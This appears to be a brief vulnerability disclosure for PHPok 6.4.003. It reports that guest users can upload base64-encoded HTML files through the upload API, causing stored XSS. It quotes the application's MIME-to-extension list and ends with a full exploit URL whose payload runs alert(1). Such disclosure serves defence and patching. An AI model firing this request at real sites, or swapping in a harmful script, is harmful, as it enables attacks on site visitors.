qinggan
The PHPok 6.4.003 has an XSS vulnerability
In the ok_f() method under the framework/api/upload_control.php file, there exists an issue where guest users can write HTML files in base64 format.
These if statements can pass through with the default given values.
Add the following judgment format, these if statements can pass through with the default given values.
The following are the suffixes that can be written, including html.
public function type2ext($type='')
{
if(!$type){
return false;
}
$list = array();
$list[] = "pdf=application/pdf";
$list[] = "xls=application/vnd.ms-excel";
$list[] = "xlsx=application/vnd.openxmlformats-officedocument.spreadsheetml.sheet";
$list[] = "csv=text/csv";
$list[] = "doc=application/msword";
$list[] = "docx=application/vnd.openxmlformats-officedocument.wordprocessingml.document";
$list[] = "ppt=application/vnd.ms-powerpoint";
$list[] = "pptx=application/vnd.openxmlformats-officedocument.presentationml.presentation";
$list[] = "json=application/json";
$list[] = "txt=text/plain";
$list[] = "jpeg=image/jpeg";
$list[] = "jpg=image/jpeg";
$list[] = "gif=image/gif";
$list[] = "png=image/png";
$list[] = "ico=image/vnd.microsoft.icon";
$list[] = "svg=image/svg+xml";
$list[] = "wav=audio/wav";
$list[] = "mp3=audio/mpeg";
$list[] = "aac=audio/aac";
$list[] = "oga=audio/ogg";
$list[] = "ogv=video/ogg";
$list[] = "mpeg=video/mpeg";
$list[] = "7z=application/x-7z-compressed";
$list[] = "zip=application/zip";
$list[] = "rar=application/x-rar-compressed";
$list[] = "html=text/html";
$list[] = "css=text/css";
$list[] = "js=text/javascript";
$list[] = "abw=application/x-abiword";
$list[] = "arc=application/x-freearc";
$list[] = "avi=video/x-msvideo";
$list[] = "azw=application/vnd.amazon.ebook";
$list[] = "bin=application/octet-stream";
$list[] = "bmp=image/bmp";
$list[] = "bz=application/x-bzip";
$list[] = "bz2=application/x-bzip2";
$list[] = "csh=application/x-csh";
$list[] = "eot=application/vnd.ms-fontobject";
$list[] = "epub=application/epub+zip";
$list[] = "htm=text/html";
$list[] = "ics=text/calendar";
$list[] = "jar=application/java-archive";
$list[] = "jsonld=application/ld+json";
$list[] = "mid=audio/midi audio/x-midi";
$list[] = "midi=audio/midi audio/x-midi";
$list[] = "mjs=text/javascript";
$list[] = "mpkg=application/vnd.apple.installer+xml";
$list[] = "odp=application/vnd.oasis.opendocument.presentation";
$list[] = "ods=application/vnd.oasis.opendocument.spreadsheet";
$list[] = "odt=application/vnd.oasis.opendocument.text";
$list[] = "ogx=application/ogg";
$list[] = "otf=font/otf";
$list[] = "rtf=application/rtf";
$list[] = "sh=application/x-sh";
$list[] = "swf=application/x-shockwave-flash";
$list[] = "tar=application/x-tar";
$list[] = "tif=image/tiff";
$list[] = "tiff=image/tiff";
$list[] = "ttf=font/ttf";
$list[] = "vsd=application/vnd.visio";
$list[] = "weba=audio/webm";
$list[] = "webm=video/webm";
$list[] = "webp=image/webp";
$list[] = "woff=font/woff";
$list[] = "woff2=font/woff2";
$list[] = "xhtml=application/xhtml+xml";
$list[] = "xml=text/xml";
$list[] = "xul=application/vnd.mozilla.xul+xml";
$list[] = "3gp=audio/3gpp";
$list[] = "3g2=audio/3gpp2";
$list[] = "xml=application/xml";
$list[] = "3gp=video/3gpp";
$list[] = "3g2=video/3gpp2";
$ext = '';
foreach($list as $key=>$value){
$tmp = explode("=",$value);
if($tmp[1] == $type){
$ext = $tmp[0];
break;
}
}
return $ext;
}
The final payload is as follows.
api.php?c=upload&f=ok&type=base64&data=text/html;base64,PCFET0NUWVBFIGh0bWw%2BCjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ%2BCjxtZXRhIGNoYXJzZXQ9IlVURi04Ij4KPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgo8dGl0bGU%2BRG9jdW1lbnQ8L3RpdGxlPgo8L2hlYWQ%2BCjxib2R5Pgo8aDE%2BSGVsbG8sIHdvcmxkITwvaDE%2BCjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD4KPC9ib2R5Pgo8L2h0bWw%2B
